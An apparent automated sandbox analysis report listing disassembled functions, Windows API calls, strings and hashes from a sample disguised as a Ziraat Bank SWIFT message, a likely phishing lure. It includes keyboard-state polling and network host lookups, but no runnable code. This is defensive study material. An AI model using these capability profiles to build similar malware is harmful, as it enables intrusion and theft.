Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1080873982-4153970271
Opcode ID: 809c464bdd33e6726dddf260057d188059d14ecb639ce835998575727dafcc40
Instruction ID: ed6d0b78ac43b7e4f4b4186abc57ef3352b7dcb8c025f5c9f979cd0f950c4f9f
Opcode Fuzzy Hash: 809c464bdd33e6726dddf260057d188059d14ecb639ce835998575727dafcc40
Instruction Fuzzy Hash: D0217C3280021AFFCF11EB90CC0AEEE7B79BF19304F040559F515660A3EB71AA29DB50

Function 000E7AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 000E7B42
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 000E7B58
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 000E7B69
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 000E7B7B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 000E7B8C

Strings

play PlayMe wait, xrefs: 000E7B76
alias PlayMe, xrefs: 000E7B1B
open , xrefs: 000E7AF1
close PlayMe, xrefs: 000E7B53, 000E7B80
play PlayMe, xrefs: 000E7B87
status PlayMe mode, xrefs: 000E7B3D

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: SendString
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 890592661-1007645807
Opcode ID: 147c7535d75583753dfe7cbb823f22436cf35c235d36113bee9a98a2fafe647b
Instruction ID: 435f425b09fab6f1febdc9ba80fe922120a7536696f026d42440983e50af62e9
Opcode Fuzzy Hash: 147c7535d75583753dfe7cbb823f22436cf35c235d36113bee9a98a2fafe647b
Instruction Fuzzy Hash: 6D11ABA1950199BDE724B7A2CC4ADFF7ABCEBD6B50F000415B835B70D2EF601A49C6B1

Function 0011DD4A Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 000BB496
SetTextColor.GDI32(?,000000FF), ref: 000BB4A0
SetBkMode.GDI32(?,00000001), ref: 000BB4B5
GetStockObject.GDI32(00000005), ref: 000BB4BD
GetClientRect.USER32(?), ref: 0011DD63
SendMessageW.USER32(?,00001328,00000000,?), ref: 0011DD7A
GetWindowDC.USER32(?), ref: 0011DD86
GetPixel.GDI32(00000000,?,?), ref: 0011DD95
ReleaseDC.USER32(?,00000000), ref: 0011DDA7
GetSysColor.USER32(00000005), ref: 0011DDC5

Strings

@U=u, xrefs: 0011DD7A

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
String ID: @U=u
API String ID: 3430376129-2594219639
Opcode ID: 3186dab3cc197d2377d7fd6d32a11ab7f5272dfbcc4364a7e45eb23d4418eb34
Instruction ID: 9d2a0a5693afe1722ddfda7714aa7096c0558759a617643a9e3a6a12ff357ba7
Opcode Fuzzy Hash: 3186dab3cc197d2377d7fd6d32a11ab7f5272dfbcc4364a7e45eb23d4418eb34
Instruction Fuzzy Hash: 93114C31500205BFDB616BB4FC09BE97BB1FB05326F108625FA66954E1CB7149A2EB21

Function 000F02EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON

Download Yara Rule

APIs

Part of subcall function 000A936C: __swprintf.LIBCMT ref: 000A93AB
Part of subcall function 000A936C: __itow.LIBCMT ref: 000A93DF

CoInitialize.OLE32(00000000), ref: 000F034B
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 000F03DE
SHGetDesktopFolder.SHELL32(?), ref: 000F03F2
CoCreateInstance.OLE32(0012DA8C,00000000,00000001,00153CF8,?), ref: 000F043E
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 000F04AD
CoTaskMemFree.OLE32(?,?), ref: 000F0505
_memset.LIBCMT ref: 000F0542
SHBrowseForFolderW.SHELL32(?), ref: 000F057E
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 000F05A1
CoTaskMemFree.OLE32(00000000), ref: 000F05A8
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 000F05DF
CoUninitialize.OLE32(00000001,00000000), ref: 000F05E1

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 4265a097a397aeadb90302fb1fadb68bd2f875ec45de7af21ad8a102c3d9eb7a
Instruction ID: 206dd90c31c1ee363be873a464243fab6b7b3d91f0765ccc030790a41355d429
Opcode Fuzzy Hash: 4265a097a397aeadb90302fb1fadb68bd2f875ec45de7af21ad8a102c3d9eb7a
Instruction Fuzzy Hash: E5B1FB75A00108AFDB14DFA4C889DAEBBB9FF49304B148459F906EB652DB70EE41CF50

Function 000E2E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 000E2ED6
SetKeyboardState.USER32(?), ref: 000E2F41
GetAsyncKeyState.USER32(000000A0), ref: 000E2F61
GetKeyState.USER32(000000A0), ref: 000E2F78
GetAsyncKeyState.USER32(000000A1), ref: 000E2FA7
GetKeyState.USER32(000000A1), ref: 000E2FB8
GetAsyncKeyState.USER32(00000011), ref: 000E2FE4
GetKeyState.USER32(00000011), ref: 000E2FF2
GetAsyncKeyState.USER32(00000012), ref: 000E301B
GetKeyState.USER32(00000012), ref: 000E3029
GetAsyncKeyState.USER32(0000005B), ref: 000E3052
GetKeyState.USER32(0000005B), ref: 000E3060

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 7fbdc395a9c0b31de8bfc81de61e56a962eae2582627fe7bbbb21d47dfb9b0e3
Instruction ID: 599c0ff760888ddef471b88a81cf1266112a39ce4f57574afe392954ac8f3ec9
Opcode Fuzzy Hash: 7fbdc395a9c0b31de8bfc81de61e56a962eae2582627fe7bbbb21d47dfb9b0e3
Instruction Fuzzy Hash: 2551E760A087D82DFB75DBA588157EABFF85F11340F0845ADC5C2672C3DA949B8CC762

Function 000DED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 000DED1E
GetWindowRect.USER32(00000000,?), ref: 000DED30
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 000DED8E
GetDlgItem.USER32(?,00000002), ref: 000DED99
GetWindowRect.USER32(00000000,?), ref: 000DEDAB
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 000DEE01
GetDlgItem.USER32(?,000003E9), ref: 000DEE0F
GetWindowRect.USER32(00000000,?), ref: 000DEE20
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 000DEE63
GetDlgItem.USER32(?,000003EA), ref: 000DEE71
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 000DEE8E
InvalidateRect.USER32(?,00000000,00000001), ref: 000DEE9B

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: b21c3a24d7d31d5c7a44e9d089b868c1a491f73e09717a4a2fb772dcd34b6992
Instruction ID: 052a30296ce5de15f7c37f8bc42dff198defc92beb19f470c5f4a1fee2cb3fba
Opcode Fuzzy Hash: b21c3a24d7d31d5c7a44e9d089b868c1a491f73e09717a4a2fb772dcd34b6992
Instruction Fuzzy Hash: 5C510CB1B00305BFDB18DF69DD89AAEBBBAFB88701F148129F519D7290DB709D418B10

Function 000BB73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 000BB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,000BB759,?,00000000,?,?,?,?,000BB72B,00000000,?), ref: 000BBA58

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,000BB72B), ref: 000BB7F6
KillTimer.USER32(00000000,?,00000000,?,?,?,?,000BB72B,00000000,?,?,000BB2EF,?,?), ref: 000BB88D
DestroyAcceleratorTable.USER32(00000000), ref: 0011D8A6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000BB72B,00000000,?,?,000BB2EF,?,?), ref: 0011D8D7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000BB72B,00000000,?,?,000BB2EF,?,?), ref: 0011D8EE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,000BB72B,00000000,?,?,000BB2EF,?,?), ref: 0011D90A
DeleteObject.GDI32(00000000), ref: 0011D91C

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 942a54ae1a11331d9538903b34e68b734cc87b72b75e0c70cfc9775f4f59b64d
Instruction ID: 6ddfee2fc3fc8167d77434cf8ce75ebbd4bb8537d5d3f116da1d6982a609f830
Opcode Fuzzy Hash: 942a54ae1a11331d9538903b34e68b734cc87b72b75e0c70cfc9775f4f59b64d
Instruction Fuzzy Hash: 19617934501601EFDB399F18ED88BA9B7F5FF94315F184529E48286A70CBF0A8D1DB84

Function 000BB40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON

Download Yara Rule

APIs

Part of subcall function 000BB526: GetWindowLongW.USER32(?,000000EB), ref: 000BB537

GetSysColor.USER32(0000000F), ref: 000BB438

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 088d042cef37693b1020703bab46deb95524af4c2ffe47ce3a39c2bb5493cb14
Instruction ID: 45c02a898e13da2652c5054cecbed561dc220971343cec68b1ec75a974312138
Opcode Fuzzy Hash: 088d042cef37693b1020703bab46deb95524af4c2ffe47ce3a39c2bb5493cb14
Instruction Fuzzy Hash: F6418E30101154AFDB346F28EC89BF93BA6FB46731F184261FD658A5E6D7B08C92DB21

Function 000E690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON

Download Yara Rule

APIs

_wcschr.LIBCMT ref: 000E6923
_wcscpy.LIBCMT ref: 000E6934
__wsplitpath.LIBCMT ref: 000E6958
__wsplitpath.LIBCMT ref: 000E6979
_wcscpy.LIBCMT ref: 000E699B
_wcscpy.LIBCMT ref: 000E69B9
_wcscpy.LIBCMT ref: 000E69C7
_wcscat.LIBCMT ref: 000E69D6
_wcscat.LIBCMT ref: 000E6A2B
_wcscat.LIBCMT ref: 000E6A61
_wcscat.LIBCMT ref: 000E6A73

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
String ID:
API String ID: 136442275-0
Opcode ID: 51ce4efe4f1713de81e4662d3516107c6540f4de69d5266242f78c31f3925c49
Instruction ID: 18a259f62f85aa2b6940de43ee7bab49368cfdaac9e6751e32ce581c05782348
Opcode Fuzzy Hash: 51ce4efe4f1713de81e4662d3516107c6540f4de69d5266242f78c31f3925c49
Instruction Fuzzy Hash: 98414D7688511CAECF61EB90DC81DCF73BDEB44300F0041E6B659A2042EA31ABE9CF55

Function 000ED76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(0013DC00,0013DC00,0013DC00), ref: 000ED7CE
GetDriveTypeW.KERNEL32(?,00153A70,00000061), ref: 000ED898
_wcscpy.LIBCMT ref: 000ED8C2

Strings

removable, xrefs: 000ED800
cdrom, xrefs: 000ED7EA
fixed, xrefs: 000ED816
network, xrefs: 000ED82C
ramdisk, xrefs: 000ED842
unknown, xrefs: 000ED859
all, xrefs: 000ED7D4

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: e1fcff94feed16184c6eee51b1b10eb4100c56e60a783054a710b94200c99796
Instruction ID: df4bf0d95b9b6b515e6d46832934e53f89f4f882e213425a7e990c1fdb99f2b4
Opcode Fuzzy Hash: e1fcff94feed16184c6eee51b1b10eb4100c56e60a783054a710b94200c99796
Instruction Fuzzy Hash: 37519735104380AFC714EF15D981AEEB7E5EF85354F10892EF9AA6B2A3DB31DD05CA42

Function 0010B33A Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 167COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0010B3F4

Strings

@U=u, xrefs: 0010B42A

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: InvalidateRect
String ID: @U=u
API String ID: 634782764-2594219639
Opcode ID: c28f04e96147c03e67db62fb9dfeb3b8a17ccb6a67b1e46630135413946ba12d
Instruction ID: a80f230e5439d3bea905b6f1b41392e4a8e20cab4f0c7bb6cdb420e265b96567
Opcode Fuzzy Hash: c28f04e96147c03e67db62fb9dfeb3b8a17ccb6a67b1e46630135413946ba12d
Instruction Fuzzy Hash: C8517D30608204BFEF349F28DCC9BA93B65FB05714F644011F695EA6E2D7F1E9909A51

Function 000BA699 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 163windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0011DB1B
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0011DB3C
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0011DB51
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0011DB6E
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0011DB95
DestroyIcon.USER32(00000000,?,?,?,?,?,?,000BA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0011DBA0
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0011DBBD
DestroyIcon.USER32(00000000,?,?,?,?,?,?,000BA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0011DBC8

Strings

@U=u, xrefs: 0011DB7A

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID: @U=u
API String ID: 1268354404-2594219639
Opcode ID: 4f7f5527bc880d9fe13c8cd5abf229cc3cad297d989708ffb9cb02eb413f7282
Instruction ID: bb02ed6f345f2fb12cf653d5015c874f622bce58a415eb04f94baa2dab57340f
Opcode Fuzzy Hash: 4f7f5527bc880d9fe13c8cd5abf229cc3cad297d989708ffb9cb02eb413f7282
Instruction Fuzzy Hash: 01518770648209EFDB24DF68DC81FEA37F9EB09350F110528F906A76A0DBB0AD90DB51

Function 000A936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 000A93AB
__itow.LIBCMT ref: 000A93DF

Part of subcall function 000C1557: _xtow@16.LIBCMT ref: 000C1578

Strings

False, xrefs: 00114C93
True, xrefs: 00114C8C
0x%p, xrefs: 00114CAD
%.15g, xrefs: 000A93A5

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: __itow__swprintf_xtow@16
String ID: %.15g$0x%p$False$True
API String ID: 1502193981-2263619337
Opcode ID: 239d487d220a1fbeeeecf11e4795f69bf32c5767acaa809cca26876ddd268415
Instruction ID: 587089568a085055e7b1b95af6db50b7787a2e685013c2e1bf5be11ac2983b96
Opcode Fuzzy Hash: 239d487d220a1fbeeeecf11e4795f69bf32c5767acaa809cca26876ddd268415
Instruction Fuzzy Hash: 3B41A472604205EFEB28DB78D941FEAB3F8EB45750F24447EE54AD7182EB319A41CB50

Function 000DB907 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 81windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 000DB98C
GetDlgCtrlID.USER32 ref: 000DB997
GetParent.USER32 ref: 000DB9B3
SendMessageW.USER32(00000000,?,00000111,?), ref: 000DB9B6
GetDlgCtrlID.USER32(?), ref: 000DB9BF
GetParent.USER32(?), ref: 000DB9DB
SendMessageW.USER32(00000000,?,?,00000111), ref: 000DB9DE

Strings

ListBox, xrefs: 000DB949
ComboBox, xrefs: 000DB911
@U=u, xrefs: 000DB9DE

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: @U=u$ComboBox$ListBox
API String ID: 1383977212-2258501812
Opcode ID: 3e29743bd8de6553962cfa58e02c8fb203898d99baeb75b7878765f40f6b455e
Instruction ID: 669131ea861c9fd0882ab88612527371f688747adcc484ac5c04b937fd3e45b9
Opcode Fuzzy Hash: 3e29743bd8de6553962cfa58e02c8fb203898d99baeb75b7878765f40f6b455e
Instruction Fuzzy Hash: 1A21C475900204FFDB04EBA0DC95EFEB7B5EB46300F110116F56197292DB755826DB70

Function 000DB9F0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 80windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 000DBA73
GetDlgCtrlID.USER32 ref: 000DBA7E
GetParent.USER32 ref: 000DBA9A
SendMessageW.USER32(00000000,?,00000111,?), ref: 000DBA9D
GetDlgCtrlID.USER32(?), ref: 000DBAA6
GetParent.USER32(?), ref: 000DBAC2
SendMessageW.USER32(00000000,?,?,00000111), ref: 000DBAC5

Strings

ListBox, xrefs: 000DBA32
ComboBox, xrefs: 000DB9FA
@U=u, xrefs: 000DBAC5

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: @U=u$ComboBox$ListBox
API String ID: 1383977212-2258501812
Opcode ID: f36effdf0dd2fa4e5ac9e85f892d23b74dde94ced045024b964b0af2ca80e429
Instruction ID: 8e8e9bd46fbe6d91b7be821947f111fd7d85afaee23566185288e53a83a46118
Opcode Fuzzy Hash: f36effdf0dd2fa4e5ac9e85f892d23b74dde94ced045024b964b0af2ca80e429
Instruction Fuzzy Hash: D321F575900204BFDB10EBA4DC85EFEBBB5EF45300F150016F55197292DB79586ADB30

Function 000E6F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 000E6F1D
gethostname.WSOCK32(?,00000100), ref: 000E6F37
gethostbyname.WSOCK32(?), ref: 000E6F44
_wcscpy.LIBCMT ref: 000E6F6C
inet_ntoa.WSOCK32(?), ref: 000E6F8A
